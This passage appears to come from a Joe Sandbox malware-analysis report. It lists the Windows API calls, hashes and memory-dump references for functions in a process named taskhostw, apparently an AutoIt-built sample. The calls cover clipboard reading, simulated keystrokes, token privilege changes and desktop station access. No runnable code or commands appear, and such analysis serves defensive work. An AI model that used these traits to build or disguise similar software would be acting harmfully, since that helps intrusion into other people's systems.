                                                                  • Instruction ID: 9044811a90cb48109314cd08246b3471573e87b9f203204b5c37b9d8992ce94e
                                                                  • Opcode Fuzzy Hash: ed8dc3b6d7d5f955ea564293f38a6657a0578ae111dc2a036396b98a595d747a
                                                                  • Instruction Fuzzy Hash: 65F0CD32950255EBDF21AFB48C063EF77A1AF20365F048516F429AB391DBB88A60DF51
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4FDE
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: d2388c72c7525ceb3a984bf610d713d90224ed4946c0c1f87dbcbec08cc5c1ee
                                                                  • Instruction ID: 324e9e80ea08eb39b3976ca35d16e1c57b8f3d00b0763252d62809edb805aab3
                                                                  • Opcode Fuzzy Hash: d2388c72c7525ceb3a984bf610d713d90224ed4946c0c1f87dbcbec08cc5c1ee
                                                                  • Instruction Fuzzy Hash: A6F03971505712CFCB389F68E4948A2BBF2AF14329321CA3EE5EA83612C731A840DF40
                                                                  APIs
                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,001B741D,00000001,00276290,?,001B3BCD,002752F8,002752E0,?,?), ref: 001D0930
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath_memmove
                                                                  • String ID:
                                                                  • API String ID: 2514874351-0
                                                                  • Opcode ID: b10c3aa23bc83a2d76651d487b6e01130c4db9c52d99c550b3e4e97d305b9747
                                                                  • Instruction ID: f26655e40b77ce1d74dc2a9237d2d0bff672f48aa1d8f721d59e853d00f87c99
                                                                  • Opcode Fuzzy Hash: b10c3aa23bc83a2d76651d487b6e01130c4db9c52d99c550b3e4e97d305b9747
                                                                  • Instruction Fuzzy Hash: AFE0863690512867C720D698AC05FFA77EDDFC86A0F0401B5FC0CD7248DA605C818690
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock
                                                                  • String ID:
                                                                  • API String ID: 2638373210-0
                                                                  • Opcode ID: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                                  • Instruction ID: fdfdcabc866df33589927f5eeae6975f0d008bb602316bd4f9abc105561c01b5
                                                                  • Opcode Fuzzy Hash: 87e92921201f7f350e3b6a5d32947fae34ea2a0dab1f5900b9b8b54ddfacd81a
                                                                  • Instruction Fuzzy Hash: DDE092B1214B009BDB348E24D8407E373E1AB15304F00081DF29AC3241EB63B882CB59
                                                                  APIs
                                                                  • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001), ref: 001B5DBF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: bd2b789c2799d5fb912b928d52706f166211c13cf7c2a581b35d52698fbf6aa9
                                                                  • Instruction ID: 366a9fad03341aa62f0503b11da1e73244263123d768d552bd58d391fd2fb294
                                                                  • Opcode Fuzzy Hash: bd2b789c2799d5fb912b928d52706f166211c13cf7c2a581b35d52698fbf6aa9
                                                                  • Instruction Fuzzy Hash: 86D0C77564020CBFE710DB80ED46FA9777CD705710F100195FD0456290D6F27D508795
                                                                  APIs
                                                                    • Part of subcall function 001D3397: __lock.LIBCMT ref: 001D3399
                                                                  • __onexit_nolock.LIBCMT ref: 001D2DE0
                                                                    • Part of subcall function 001D2E08: RtlDecodePointer.NTDLL(?,00000000,00000000,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E1B
                                                                    • Part of subcall function 001D2E08: DecodePointer.KERNEL32(?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E26
                                                                    • Part of subcall function 001D2E08: __realloc_crt.LIBCMT ref: 001D2E67
                                                                    • Part of subcall function 001D2E08: __realloc_crt.LIBCMT ref: 001D2E7B
                                                                    • Part of subcall function 001D2E08: EncodePointer.KERNEL32(00000000,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E8D
                                                                    • Part of subcall function 001D2E08: EncodePointer.KERNEL32(001EB73A,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2E9B
                                                                    • Part of subcall function 001D2E08: EncodePointer.KERNEL32(00000004,?,?,001D2DE5,001EB73A,00269ED0), ref: 001D2EA7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
                                                                  • String ID:
                                                                  • API String ID: 3536590627-0
                                                                  • Opcode ID: 4fc53cdbddac825a099aabbd4814c8b277542188285bf200aa4664f03b7d5ca7
                                                                  • Instruction ID: bd88932d45e4fb41f69be2f2e3843709423eb0c63d0f184048744fae1c4406e0
                                                                  • Opcode Fuzzy Hash: 4fc53cdbddac825a099aabbd4814c8b277542188285bf200aa4664f03b7d5ca7
                                                                  • Instruction Fuzzy Hash: DDD01271D10219AADB10BBA4C90675D76B06F30723F544147F024A62C2CF7847428B91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __wfsopen
                                                                  • String ID:
                                                                  • API String ID: 197181222-0
                                                                  • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction ID: 0efe7b4cb329139b699956e748f8245a6940664583f87e1a66b457fb2b6e345a
                                                                  • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                  • Instruction Fuzzy Hash: F3B0927644020C77CF012A82EC02A493B5AAB507A4F408021FB0C182A2A6B3A660A689
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 0021D28B
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 1452528299-0
                                                                  • Opcode ID: 4a346f61cc4ca40fd8d96ef0dab5176c3ef7f090e6bdeb78141e0f08724e13f6
                                                                  • Instruction ID: bf9f4236a9a78f1c2e04b7ab67fc4625d7f22e3075b61ff32fc41aa71a24d3b2
                                                                  • Opcode Fuzzy Hash: 4a346f61cc4ca40fd8d96ef0dab5176c3ef7f090e6bdeb78141e0f08724e13f6
                                                                  • Instruction Fuzzy Hash: 2A717230214302CFC714EF24C591BEAB7E5AFA8314F44456DF9A69B2A2DB30ED59CB52
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction ID: 0679dba16b2996da919b765ba8e3cfbd062403a879c0f3bc978dfd24efd3b5db
                                                                  • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                  • Instruction Fuzzy Hash: DF31D274A005059BC71ADF98C480A69FBA6FF4D300F698AA6E40ACB355DB30EDC1CB90
                                                                  APIs
                                                                    • Part of subcall function 001B2612: GetWindowLongW.USER32(?,000000EB), ref: 001B2623
                                                                  • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0023CBA1
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0023CBFF
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0023CC40
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0023CC6A
                                                                  • SendMessageW.USER32 ref: 0023CC93
                                                                  • _wcsncpy.LIBCMT ref: 0023CCFF
                                                                  • GetKeyState.USER32(00000011), ref: 0023CD20
                                                                  • GetKeyState.USER32(00000009), ref: 0023CD2D
                                                                  • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0023CD43
                                                                  • GetKeyState.USER32(00000010), ref: 0023CD4D
                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0023CD76
                                                                  • SendMessageW.USER32 ref: 0023CD9D
                                                                  • SendMessageW.USER32(?,00001030,?,0023B37C), ref: 0023CEA1
                                                                  • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0023CEB7
                                                                  • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0023CECA
                                                                  • SetCapture.USER32(?), ref: 0023CED3
                                                                  • ClientToScreen.USER32(?,?), ref: 0023CF38
                                                                  • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0023CF45
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0023CF5F
                                                                  • ReleaseCapture.USER32(?,?,?), ref: 0023CF6A
                                                                  • GetCursorPos.USER32(?), ref: 0023CFA4
                                                                  • ScreenToClient.USER32(?,?), ref: 0023CFB1
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0023D00D
                                                                  • SendMessageW.USER32 ref: 0023D03B
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0023D078
                                                                  • SendMessageW.USER32 ref: 0023D0A7
                                                                  • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0023D0C8
                                                                  • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0023D0D7
                                                                  • GetCursorPos.USER32(?), ref: 0023D0F7
                                                                  • ScreenToClient.USER32(?,?), ref: 0023D104
                                                                  • GetParent.USER32(?), ref: 0023D124
                                                                  • SendMessageW.USER32(?,00001012,00000000,?), ref: 0023D18D
                                                                  • SendMessageW.USER32 ref: 0023D1BE
                                                                  • ClientToScreen.USER32(?,?), ref: 0023D21C
                                                                  • TrackPopupMenuEx.USER32 ref: 0023D24C
                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0023D276
                                                                  • SendMessageW.USER32 ref: 0023D299
                                                                  • ClientToScreen.USER32(?,?), ref: 0023D2EB
                                                                  • TrackPopupMenuEx.USER32 ref: 0023D31F
                                                                    • Part of subcall function 001B25DB: GetWindowLongW.USER32(?,000000EB), ref: 001B25EC
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0023D3BB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                  • String ID: @GUI_DRAGID$F$pb'
                                                                  • API String ID: 3977979337-2808172194
                                                                  • Opcode ID: 297e47eaca0dfaf19fb50153249e9fd7ffa858d7d55e6ea580ce3d14bfe0f6aa
                                                                  • Instruction ID: 90b4f06a4e6209225ebf8376dc149b099de9d4596591cd7b0c75a65dc2c0230c
                                                                  • Opcode Fuzzy Hash: 297e47eaca0dfaf19fb50153249e9fd7ffa858d7d55e6ea580ce3d14bfe0f6aa
                                                                  • Instruction Fuzzy Hash: 3A42CDB1614302AFD724CF24E849EAABBF5FF49314F240919F699A72A0C771D864CF52
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove$_memset
                                                                  • String ID: $ ]K$"$'$)$+$-$0$9$<$@$P\K$R$n$o$p$q$s{p${
                                                                  • API String ID: 1357608183-3800155241
                                                                  • Opcode ID: 7fb23c0ea95eae181f8063c26a19969d91ab191ae711f17df03a445248dae851
                                                                  • Instruction ID: dfde7f7695087ab10429923978f8605f7b6bdf1f1aa99ff58e0c99e58ededce7
                                                                  • Opcode Fuzzy Hash: 7fb23c0ea95eae181f8063c26a19969d91ab191ae711f17df03a445248dae851
                                                                  • Instruction Fuzzy Hash: AD93A275E00215DFDF24CFA8C895BBDB7B1FF48714F24816AE959AB280EB749981CB40
                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 001B4A3D
                                                                  • FindWindowW.USER32 ref: 001ED9BE
                                                                  • IsIconic.USER32(?), ref: 001ED9C7
                                                                  • ShowWindow.USER32(?,00000009), ref: 001ED9D4
                                                                  • SetForegroundWindow.USER32(?), ref: 001ED9DE
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 001ED9F4
                                                                  • GetCurrentThreadId.KERNEL32 ref: 001ED9FB
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 001EDA07
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 001EDA18
                                                                  • AttachThreadInput.USER32(?,00000000,00000001), ref: 001EDA20
                                                                  • AttachThreadInput.USER32(00000000,?,00000001), ref: 001EDA28
                                                                  • SetForegroundWindow.USER32(?), ref: 001EDA2B
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA40
                                                                  • keybd_event.USER32 ref: 001EDA4B
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA55
                                                                  • keybd_event.USER32 ref: 001EDA5A
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA63
                                                                  • keybd_event.USER32 ref: 001EDA68
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 001EDA72
                                                                  • keybd_event.USER32 ref: 001EDA77
                                                                  • SetForegroundWindow.USER32(?), ref: 001EDA7A
                                                                  • AttachThreadInput.USER32(?,?,00000000), ref: 001EDAA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                  • String ID: Shell_TrayWnd
                                                                  • API String ID: 4125248594-2988720461
                                                                  • Opcode ID: 6e980be78ec05ad0fdcfb3bb84922ba0f0df38b0567c96a7cbfd60c3a8304ffb
                                                                  • Instruction ID: deef5a3acb684814c4eff75ae3182b39b9d9d61cbfb5ce26eeab3ad3c263ef6f
                                                                  • Opcode Fuzzy Hash: 6e980be78ec05ad0fdcfb3bb84922ba0f0df38b0567c96a7cbfd60c3a8304ffb
                                                                  • Instruction Fuzzy Hash: 1C315271E40318BBEB206F62BD4AF7E7E6CEB44B50F114035FA05AA1D1D6B05911ABA0
                                                                  APIs
                                                                    • Part of subcall function 00208AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00208AED
                                                                    • Part of subcall function 00208AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00208B1A
                                                                    • Part of subcall function 00208AA3: GetLastError.KERNEL32 ref: 00208B27
                                                                  • _memset.LIBCMT ref: 0020867B
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 002086CD
                                                                  • CloseHandle.KERNEL32(?), ref: 002086DE
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002086F5
                                                                  • GetProcessWindowStation.USER32 ref: 0020870E
                                                                  • SetProcessWindowStation.USER32 ref: 00208718
                                                                  • OpenDesktopW.USER32 ref: 00208732
                                                                    • Part of subcall function 002084F3: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00208631), ref: 00208508
                                                                    • Part of subcall function 002084F3: CloseHandle.KERNEL32(?), ref: 0020851A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                  • String ID: $default$winsta0
                                                                  • API String ID: 2063423040-1027155976
                                                                  • Opcode ID: bec113b21adf6d38d8c15e326d1e937021e311f580d38dd88221f4ded80a14c2
                                                                  • Instruction ID: 2c52a191ffe692eaa54373e913e9effb36bed11446a463163055854c7597c162
                                                                  • Opcode Fuzzy Hash: bec113b21adf6d38d8c15e326d1e937021e311f580d38dd88221f4ded80a14c2
                                                                  • Instruction Fuzzy Hash: 7F816F7191030EAFDF119FA4ED49AEF7B78EF04304F148169F954A61A2DB318E24DB60
                                                                  APIs
                                                                  • OpenClipboard.USER32(0023F910), ref: 002240A6
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 002240B4
                                                                  • GetClipboardData.USER32 ref: 002240BC
                                                                  • CloseClipboard.USER32 ref: 002240C8
                                                                  • GlobalLock.KERNEL32(00000000), ref: 002240E4
                                                                  • CloseClipboard.USER32 ref: 002240EE
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00224103
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 00224110
                                                                  • GetClipboardData.USER32 ref: 00224118
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00224125
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00224159
                                                                  • CloseClipboard.USER32 ref: 00224269
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                  • String ID:
                                                                  • API String ID: 3222323430-0
                                                                  • Opcode ID: 15b3cf6a2dd7da401a237829a32d90c3d1b98a207804c95f6ea405cf38b05afb
                                                                  • Instruction ID: 451f16781e1a56a3764830ecbeadc599ee5b451e93d596062031c9f1b59c02c2
                                                                  • Opcode Fuzzy Hash: 15b3cf6a2dd7da401a237829a32d90c3d1b98a207804c95f6ea405cf38b05afb
                                                                  • Instruction Fuzzy Hash: 63518135214312ABD311BFA1FD8AF6F77A8AF94B00F004529FA56D21E1DF70D9158B62
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 0021C819
                                                                  • FindClose.KERNEL32(00000000), ref: 0021C86D
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0021C892
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0021C8A9
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0021C8D0
                                                                  • __swprintf.LIBCMT ref: 0021C91C
                                                                  • __swprintf.LIBCMT ref: 0021C95F
                                                                    • Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82
                                                                  • __swprintf.LIBCMT ref: 0021C9B3
                                                                    • Part of subcall function 001D3818: __woutput_l.LIBCMT ref: 001D3871
                                                                  • __swprintf.LIBCMT ref: 0021CA01
                                                                    • Part of subcall function 001D3818: __flsbuf.LIBCMT ref: 001D3893
                                                                    • Part of subcall function 001D3818: __flsbuf.LIBCMT ref: 001D38AB
                                                                  • __swprintf.LIBCMT ref: 0021CA50
                                                                  • __swprintf.LIBCMT ref: 0021CA9F
                                                                  • __swprintf.LIBCMT ref: 0021CAEE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
